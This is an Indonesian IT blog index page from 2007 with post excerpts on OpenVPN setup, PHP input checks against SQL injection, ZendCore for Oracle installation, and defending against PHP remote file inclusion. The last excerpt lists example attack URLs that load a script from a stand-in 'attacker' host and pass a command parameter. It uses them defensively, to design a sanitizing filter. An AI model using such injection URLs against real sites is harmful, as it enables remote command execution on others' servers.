Mercubuana-IT

Membangun OpenVPN di Linux Slackware

Ditulis Oleh: roninmorgue
Senin, 24 September 2007
Akhirnya selesai juga saya membangun VPN Server dikantor, dan seperti biasanya artikel ini saya tulis sebagai referensi buat saya sendiri. OK, langsung saja...saya menggunakan Slackware R12 sebagai servernya dan menggunakan OpenVPN-1.6.0 root@slackware:/usr/local/openvpn/openvpn-1.6.0# tar -zxvf openvpn-1.6.0.tar.gz root@slackware:/usr/local/openvpn/openvpn-1.6.0# cd openvpn-1.6.0 root@slackware:/usr/local/openvpn/openvpn-1.6.0# ./configure root@slackware:/usr/local/openvpn/openvpn-1.6.0# make root@slackware:/usr/local/openvpn/openvpn-1.6.0# make install LOOPBACK TESTS (after BUILD): Test Crypto: root@slackware:/usr/local/openvpn/openvpn-1.6.0# ./openvpn --genkey --secret key root@slackware:/usr/local/openvpn/openvpn-1.6.0# ./openvpn --test-crypto --secret key -------------------------- potong ------------------------------------------ Mon Sep 24 14:50:24 2007 1293: TESTING ENCRYPT/DECRYPT of packet length=1292 Mon Sep 24 14:50:24 2007 1294: TESTING ENCRYPT/DECRYPT of packet length=1293 Mon Sep 24 14:50:24 2007 1295: TESTING ENCRYPT/DECRYPT of packet length=1294 Mon Sep 24 14:50:24 2007 1296: TESTING ENCRYPT/DECRYPT of packet length=1295 Mon Sep 24 14:50:24 2007 1297: TESTING ENCRYPT/DECRYPT of packet length=1296 Mon Sep 24 14:50:24 2007 1298: TESTING ENCRYPT/DECRYPT of packet length=1297 Mon Sep 24 14:50:24 2007 1299: TESTING ENCRYPT/DECRYPT of packet length=1298 Mon Sep 24 14:50:24 2007 1300: TESTING ENCRYPT/DECRYPT of packet length=1299 Mon Sep 24 14:50:24 2007 1301: TESTING ENCRYPT/DECRYPT of packet length=1300 Mon Sep 24 14:50:24 2007 1302: OpenVPN crypto self-test mode SUCCEEDED. Test SSL/TLS negotiations (runs for 2 minutes): ./openvpn --config sample-config-files/loopback-server (Simultaneously in another window) root@slackware:/usr/local/openvpn/openvpn-1.6.0# ./openvpn --config sample-config-files/loopback-server Mon Sep 24 14:51:05 2007 0: OpenVPN 1.6.0 i686-pc-linux-gnu [SSL] built on Sep 14 2007 Mon Sep 24 14:51:05 2007 1: Diffie-Hellman initialized with 1024 bit key Mon Sep 24 14:51:05 2007 2: WARNING: file 'sample-keys/server.key' is group or others accessible Mon Sep 24 14:51:05 2007 3: Control Channel MTU parms [ L:1341 D:138 EF:38 EB:0 ET:0 EL:0 ] Mon Sep 24 14:51:05 2007 4: Data Channel MTU parms [ L:1341 D:1341 EF:41 EB:0 ET:0 EL:0 ] Mon Sep 24 14:51:05 2007 5: Local Options hash (VER=V3): '4e46f95f' Mon Sep 24 14:51:05 2007 6: Expected Remote Options hash (VER=V3): 'c2e6d23e' Mon Sep 24 14:51:05 2007 7: UDPv4 link local (bound): 127.0.0.1:16000 Mon Sep 24 14:51:05 2007 8: UDPv4 link remote: 127.0.0.1:16001 Be first to comment this article \| Views: 1483
Selengkapnya...

Trik mencegah SQL injection

Ditulis Oleh: Qnoyyy
Minggu, 16 September 2007
ini ada penjelasan bagus mengenai SQL Injection : http://www.unixwiz.net/techtips/sql-injection.html Sekarang bagaimana cara memproteksi form inputan kita dari serangan model seperti itu.. php sudah menyediakan fungsi untuk itu : berikut scriptnya // menggunakan ctype_alnum if ((ctype_alnum($username) == false) or (ctype_alnum($pass) == false)) { die ("Maaf, anda harus menginputkan alphanumerik") : } ?> lebih jelasnya bisa liat disini mengenai fungsi tersebut : http://www.php.net/ctype_alnum Mudah-mudahan dengan cara ini sedikit mengurangi orang-orang yang iseng.. :) Be first to comment this article \| Views: 549

Selamat Menunaikan Ibadah Puasa

Ditulis Oleh: Administrator

Selasa, 11 September 2007

Kami atas nama mercubuana-it.org Mengucapkakan Selamat Menunaikan Ibadah Puasa, mohon maaf apabila selama ini banyak tulisan-tulisan yang tidak berkenan..

Be first to comment this article | Views: 345

Membangun Web Server dengan ZendCore For Oracle

Ditulis Oleh: roninmorgue
Selasa, 04 September 2007
Tutorial ini saya tulis setelah saya berhasil membangun web server di kantor saya (Menggunakan RHELAS 3). Adapun kebutuhan dari web server tersebut adalah dapat berkomunikasi dengan database Oracle (Oracle 10g) (pada mesin yang berbeda/remote) dan MySQL(lokal mesin), serta PHP sebagai bahasa pemrograman web-nya. Berdasarkan kebutuhan tersebut maka Software yang digunakan adalah: 1. ZendCoreForOracle-v2.0.1-Linux-x86.tar.gz 2. oracle-instantclient-basic-10.2.0.3-1.i386.rpm 3. oracle-instantclient-devel-10.2.0.3-1.i386.rpm 4. mysql-5.0.45-linux-i686-glibc23.tar.gz 5. phpMyAdmin-2.11.0-rc1-all-languages.tar.bz2 Langkah-langkah : Instalasi ZendCoreForOracle 1. Login sebagai root pada shell anda dan extract ZendCoreForOracle [root@webserver gunawan]# gunzip /home/gunawan/ZendCoreForOracle-v2.0.1-Linux-x86.tar.gz \| tar xvf - 2. Masuk kedalam direktori hasil extract [root@webserver gunawan]# cd ZendCoreForOracle-v2.0.1-Linux-x86 3. Jalankan script instalasi [root@webserver gunawan]# ./install 4. Saat Wizard Instalasi berjalan, ikuti semua petunjuknya sampai instalasi selesai. 5. Untuk mengakses/melakukan konfigurasi ZendCore dapat menggunakan web based http://alamat_host:port/ZendCore Be first to comment this article \| Views: 852
Selengkapnya...

Explore the sky with Google Earth

Ditulis Oleh: Qnoyyy

Minggu, 26 Agustus 2007

Mungkin sudah pada tau dengan google earth, sekarang google mengeluarkan versi untuk melihat angkasa. Terdapat tools baru yang dapat kita gunakan yaitu Sky.. Bagus sekali untuk menjadi bahan pengetahuan...

Informasi dapat kita lihat disini

http://earth.google.com/sky/skyedu.html

* Kapan lagi kita bisa melihat luasnya Alam semesta.. :)

Be first to comment this article | Views: 451

Mengamankan PHP Injection

Ditulis Oleh: roninmorgue
Minggu, 26 Agustus 2007
Category: Security Author: roninmorgue Date: January, 01st 2007 Location: Indonesia, Jakarta Web: http://www.forum.mercubuana-it.org/ ---------------------------------------------------------------------------------- Affected Description ````````````````````` Serangan web dewasa ini semakin banyak memanfaatkan vulnerabillity pada script PHP, yaitu saat seorang programmer tidak melakukan sanitasi input pada script yang dia buat, disaat register_globals ON dan allow_fopen_url maka seorang attacker dapat melakukan injeksi pada script PHP yang vulnerable secara remote. Caranya yaitu dengan mengeksekusi script vulnerable dengan meng-inject melalui url dari server attacker yang telah berisi script untuk melakukan exploitasi. Dampak ini dapat dihilangkan dengan men-set register_globals OFF, tetapi cara ini kurang effektif karena banyak aplikasi third party yang mengharuskan register_globals ON. Better Solutions `````````````````` Teknik-teknik PHP Injection yang sering digunakan oleh attacker : 1. www.target.com/main.php?r=http://attacker/cmd.jpg?&cmd=<unix command> 2. www.target.com/main.php?r=http://attacker/cmd.gif&cmd=<unix command> 3. www.target.com/main.php?r=http://attacker/cmd.txt\&cmd=<unix command> 4. www.target.com/main.php?r=http://attacker/cmd.txt&cmd=<unix command> 5. www.target.com/main.php?r=http://attacker/cmd.jpg?cmd=<unix command> dengan melihat url tersebut kita dapat mengambil kesimpulan bahwa : 1. attacker menyimpan script inject dalam bentuk extension jpg, gif, dan txt 2. attacker menggunakan variabel cmd untuk injection 3. attacker menggunakan beberapa kombinasi penghubung Berdasarkan hal tersebut kita dapat membuat sebuah script sederhana untuk mensanitasi bentuk url yang dicurigai sebagai bentuk PHP Injection, serta melakukan logging terhadap aktifitas dari attacker. Ok...to the point, this the script : Be first to comment this article \| Views: 1775
Selengkapnya...

Lagi...

Setting Ethernet Marvel di Linux RHELAS 3

<< Awal < Sebelum 1 2 3 4 5 6 7 8 Berikut > Akhir >>

Hasil 25 - 31 dari 56

Main Menu

RSS Feed

Login Form

Polls

Syndicate

Total Users

Pengunjung

Popular